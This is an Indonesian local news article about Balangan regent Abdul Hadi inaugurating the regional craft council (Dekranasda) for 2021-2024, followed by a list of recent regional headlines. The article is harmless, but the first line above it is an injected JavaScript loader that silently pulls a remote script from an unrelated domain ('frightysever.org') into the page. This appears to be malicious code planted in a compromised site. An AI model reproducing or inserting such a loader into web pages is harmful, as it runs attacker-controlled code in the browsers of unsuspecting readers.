(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Bupati Abdul Hadi Resmi Lantik Anggota Dekranasda Balangan Periode 2021-2024


KANALKALIMANTAN.COM, PARINGIN – Bupati Abdul Hadi resmi melantik kepengurusan Anggota Dewan Kerajinan Nasional Daerah (DEKRANASDA) Kabupaten Balangan periode 2021-2024 yang digelar di Aula Benteng Tundakan, Senin (13/12/2021).

Bupati Abdul Hadi mengucapkan selamat sembari berpesan kepada seluruh anggota Dekranasda yang baru dilantik agar dapat sepenuhnya berkiprah untuk membangun daerah.

“Kepercayaan bukan sekedar amanat tetapi sekaligus kesempatan berkiprah dan menjadi bagian dari pembangunan daerah,” katanya.

Dikatakan Abdul Hadi, Dekranasda merupakan wadah perjuangan untuk mengangkat potensi-potensi daerah agar Balangan dikenal dan diidentikkan dengan suatu produk kerajinan.

 

Baca juga : Tok! Dua Raperda Usulan Pemkab Barsel Disepakati di Paripurna Dewan

Ia berpesan kepada segenap pengurus dan Anggota yang baru saja di lantik, kata Bupati Abdul hadi, untuk menjalankan amanat sebaik mungkin.

“Ciptakan inovasi, buat program yang bermanfaat efisien dan efekif untuk mendorong masyarakat lebih kreatif dan lebih produktif menuju Balangan yang lebih maju dan sejahtera,” imbuhnya.

Terpisah Dandim 1001/HSU-BLG Letkol Inf Aldin Hadi, memberikan Ucapan selamat kepada segenap pengurus dan anggota Dekranasda Balangan yang baru dilantik.

“Selamat menjalankan tugas, dan bisa berperan aktif dalam mengembangkan kreatifitas dalam meningkatkan perekonomian di masyarakat Balangan,” ucapnya.

Dalam acara tersebut hadir pula Ketua Persit Ketua Persit KCK Cabang XXIV Kodim 1001/HSU – BLG Melyence Aldin, dan juga Ibu Ketua Bhayangkari Cabang Polres Balangan Utie Zaenal. (kanalkalimantan.com/dew)

Reporter : dew
Editor : cell


Desy Arfianty

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

10 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

10 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

10 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

10 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

11 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

11 jam ago

This website uses cookies.